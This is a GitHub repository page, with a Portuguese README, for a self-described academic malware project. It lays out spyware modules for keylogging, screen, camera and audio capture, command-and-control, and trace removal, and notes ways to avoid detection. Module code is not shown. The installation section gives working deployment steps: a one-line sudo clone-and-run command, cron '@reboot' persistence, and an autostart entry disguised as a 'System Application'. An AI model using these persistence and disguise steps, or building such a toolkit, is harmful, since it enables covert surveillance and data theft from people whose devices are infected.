Skip to content

efraim-lima/malwares

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

57 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Bem-vindo ao meu repositório de Malwares! 👋

Aviso Importante

O objetivo deste repositório é puramente acadêmico e todas as informações e códigos aqui fornecidos devem ser usados apenas para fins educacionais e de aprendizado. É crucial ressaltar que qualquer uso inadequado e/ou ilícito dessas informações é estritamente proibido. Portanto, algumas funcionalidades estão sendo mascaradas para evitar o uso indevido e/ou malicioso desse material.

Sobre mim

🔒🔍📊🔑🌐🛡️🔬🚀⛓️🕵️‍♂️ Meu nome é Efraim Lima e sou um entusiasta da cibersegurança, mergulhando em um campo fascinante que é amplamente discutido devido às inúmeras situações em que a falta de medidas de segurança adequadas tem causado complicações significativas tanto para indivíduos quanto para empresas. Meu foco de estudo está voltado para a inteligência em segurança cibernética, resposta a incidentes e espionagem.

Como me encontrar

Se você está interessado em saber mais sobre os conceitos, trocar ideias ou contribuir com o projeto, sinta-se à vontade para entrar em contato comigo através do LinkedIn. Acredito que o compartilhamento de conhecimento é essencial para o avanço da segurança cibernética. 👥

🔒🔍📊🔑🌐🛡️🔬🚀⛓️🕵️‍♂️

Experiência e Conhecimentos

  • 👨‍💼 Embora eu não tenha experiência direta na área de cibersegurança, adquiri conhecimentos sobre diversas técnicas, especialmente na área de inteligência em segurança cibernética e resposta a incidentes;
  • 🚀 Estou constantemente buscando aprender novas tecnologias e práticas relacionadas à segurança cibernética;
  • 🔍 Tenho interesse particular no estudo do desenvolvimento de malwares, como Trojans, Spywares e Worms, bem como nos processos de Command & Control (C&C) que permitem o controle desses malwares;
  • ⛓️ Tenho conhecimento sobre a Kill Chain, uma estrutura que descreve as etapas pelas quais um ataque cibernético passa, desde o reconhecimento inicial até a exfiltração de dados e o impacto no alvo.

Projetos

Este repositório contém alguns projetos e scripts relacionados à segurança cibernética, incluindo:

  • 📁 instalação: O projeto procura automatizar todo processo de instalação em um host para minimizar o trabalho durante o momento de infecção do alvo. Dessa forma o tempo para início da ação de reconhecimento é reduzido;

  • ⚙️ command & control (C2): O objetivo dessa etapa é estabelecer uma porta aberta e sempre disponível para que o atacante possa enviar comandos via CLI de maneira remota para a máquina alvo, proporcionando maior flexibilidade para um reconhecimento mais estruturado e pleno;

  • 🖥️ screen: O pretexto da existencia dessa ferramenta é capturar a tela do usuário e armazenar pequenos volumes de vídeo dessa captura em um banco de dados para analisar posteriormete; junto a função de capturar a tela temos outra que pretende capturar o audio que sairia do device, mas ainda não foi completamente testado.

  • 🕵️‍♂️ spyware: Todo o projeto funciona como um spyware, capturando informações do alvo e armazenando em um banco de dados;

  • ⌨️ keylogger: Este projeto mostra a implementação de um keylogger, uma ferramenta que registra todas as teclas pressionadas em um sistema. Em minha funcionalidade do keylogger também implementei uma função de analise das palavras que será muito útil posteriormente para analisar palavras repetidas capturadas e elencar por prioridade.

  • 📷 captura de imagens: Exploro também a captura de fotos e vídeos da câmera, com o objetivo de compilar informações visuais para analise posterior. Este módulo ainda não comporta inibição da ativação do led das câmeras;

  • 🎤 audio: Aqui estudo como poderia capturar o audio da máquina, de maneira a compreender que este tipo de funcionalidade poderia passar desapercebida pelo sistema por não acionar funcionalidades extras, mas digo isso apenas neste projeto e em analises preeliminares. Caso venha disfarçado de um trojan seria de difícil detecção;

  • 📊 logs: Na parte de analise de logs procuro catalogar todo e qualquer tipo de alteração no sistema, assim como: arquivos alterados, aplicações (iniciação, fechamento e suspensão), eventos de inicialização e modificação de aplicações;

  • 🌐 rede: No quesito redes temos um módulo chamado "network" que analisa todas portas abertas na rede local, avalia qual serviçõ está em execução naquela interface, procura sua pasta origem e analisa cada arquivo nesse diretório gerando o hash dao arquivo e comparando com provedores de antivirus através da conexão de uma API;

  • 🗑️ trash: Concluo limpando automaticamente todos arquivos que foram deletados durante as varreduras para não sobrecarregar ainda mais o host alvo. Futuramente a meta é conseguir apagar rastros no sistema assim como logs, portas abertas e históricos;

Manual de Instalação e Execução Manual

Requisitos

Antes de começar, certifique-se de ter os seguintes requisitos instalados em seu sistema:

  • Git
  • Python 3
  • pip
  • virtualenv

Você pode verificar se esses requisitos estão instalados executando os seguintes comandos:

Verificar se o Git está instalado

git --version

Verificar se o Python 3 está instalado

python3 --version

Verificar se o pip está instalado

pip3 --version

Verificar se o virtualenv está instalado

virtualenv --version

Caso algum dos requisitos não esteja instalado, você pode instalá-lo usando o gerenciador de pacotes apropriado para o seu sistema.

Clonando o Repositório

Para começar, abra um terminal e execute o seguinte comando para clonar o repositório:

git clone https://github.com/efraim-lima/malwares /chrome

**

Habilitando o Modo de Desenvolvedor no Chromebook

Se você estiver usando um Chromebook, pode habilitar o modo de desenvolvedor usando o seguinte procedimento:

1 - Desligue o Chromebook. 2 - Pressione e segure as teclas Esc + Refresh (normalmente é a quarta tecla na fileira superior com uma seta circular) no teclado. 3 - Enquanto mantém essas teclas pressionadas, pressione o botão de ligar para ligar o Chromebook. 4 - Solte as teclas quando você ver a tela de recuperação. 5 - A partir daqui, use as teclas de seta para navegar até as opções avançadas e pressione Enter. 6 - Na próxima tela, selecione 'Enable Developer Mode' e pressione Enter. 7 - Na última tela, pressione 'Confirm'.

**

Instalação do Python e Dependências

Agora, vamos instalar o Python e as dependências necessárias para a aplicação. Execute os seguintes comandos:

sudo apt update sudo apt install -y git python3 python3-pip python3-venv

Criação e Ativação do Ambiente Virtual

Para isolar a instalação das dependências, vamos criar e ativar um ambiente virtual. Execute os seguintes comandos:

python3 -m venv /caminho/para/sua_aplicacao/venv source /caminho/para/sua_aplicacao/venv/bin/activate

Instalação das Dependências

Agora, vamos instalar as dependências do arquivo requirements.txt. Execute o seguinte comando:

pip install -r /caminho/para/sua_aplicacao/requirements-linux.txt

Executando a Aplicação

Finalmente, podemos executar a aplicação. Execute o seguinte comando:

python3 /caminho/para/sua_aplicacao/modules/play.py

Configurando a Inicialização Automática (Opcional)

Caso deseje que a aplicação seja iniciada automaticamente com o sistema, você pode seguir os seguintes passos:

1 - Crie um arquivo "malwares.desktop" no diretório "/home/seu_usuario/.config/autostart/", substituindo "seu_usuario" pelo seu nome de usuário.

2 - Adicione o seguinte conteúdo ao arquivo:

[Desktop Entry]
Type=Application
Exec=/caminho/para/sua_aplicacao/venv/bin/python3 /caminho/para/sua_aplicacao/modules/play.py
Hidden=false
NoDisplay=false
X-GNOME-Autostart-enabled=true
Name[en_US]=My Python App
Name=My Python App
Comment[en_US]=System Application
Comment=System Application

3 - Defina as permissões corretas para o arquivo:

chmod +x /home/seu_usuario/.config/autostart/My_Python_App.desktop

4 - Tornar o script play.py persistente com cron:

(crontab -l 2>/dev/null; echo "@reboot /tools/play.py") | crontab -

Agora, sua aplicação está instalada e pronta para ser executada. Certifique-se de seguir todos os passos corretamente para garantir o funcionamento adequado da aplicação em seu sistema.

Estrutura do Código

A estrutura do código neste repositório é organizada da seguinte maneira:

  • root │ autostart.user.js │ C2.py │ create_requirements.py │ duckyscript.sh │ play.py │ start.service │ start_chrome.sh │ start_darwin.sh │ start_linux.sh │ start_windows.bat │ taping.txt │ init.py │ ├───modules │ │ analysis.py │ │ audio.py │ │ camera.py │ │ config.txt │ │ cpu.py │ │ database.py │ │ data_collection.py │ │ images.py │ │ installer.py │ │ keyboards.py │ │ logs.py │ │ network.py │ │ packets.py │ │ screens.py │ │ system.py │ │ tapingII.txt │ │ trash.py │ │ videos.py │ │ init.py │ │ │ ├───CNC │ │ C2.py │ │ CNC.py │ │ CNC.sh │ │ CNC_chrome.sh │ │ CNC_chromeII.sh │ │ CNC_darwin.sh │ │ CNC_linux.sh │ │ CNC_remote.sh │ │ CNC_windows.bat │ │ commandandcontrol.py │ │ SSH.sh │ │ teste.sh │ │ │ ├───logs │ │ file_logs.txt │ │ system_logs.txt │ │ │ └───__pycache__ │ audio.cpython-311.pyc │ database.cpython-311.pyc │ images.cpython-311.pyc │ logs.cpython-311.pyc │ init.cpython-311.pyc │ └───olds audio_alternate.py commandandcontrol.py logs_full.py teste.py testeII.py trojan.py video_path.py

Executando a Aplicação completa em um único comando no terminal

Para quem deseja iniciar toda a aplicação em um único comando usado no terminal, basta digitar:

sudo apt install -y git && cd "$HOME" && git clone https://www.github.com/efraim-lima/malwares && cd "$HOME"/malwares/tools && chmod +x start.sh && sudo ./start.sh

About

This is a repository that I'm studying about malwares and trojans: How develop a trojan horse and how apply "Command & Control" in this process. My objective is completly academic an these files do not must bu used for malicious activities.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors